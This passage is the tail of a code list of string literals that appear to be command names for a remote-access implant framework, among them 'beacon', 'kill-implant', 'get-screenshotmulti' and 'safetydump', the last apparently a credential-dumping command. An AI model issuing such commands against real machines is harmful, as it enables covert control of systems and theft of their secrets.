    "back", "ps", "beacon", "setbeacon", "kill-implant",
    "get-screenshotmulti", "safetydump",
]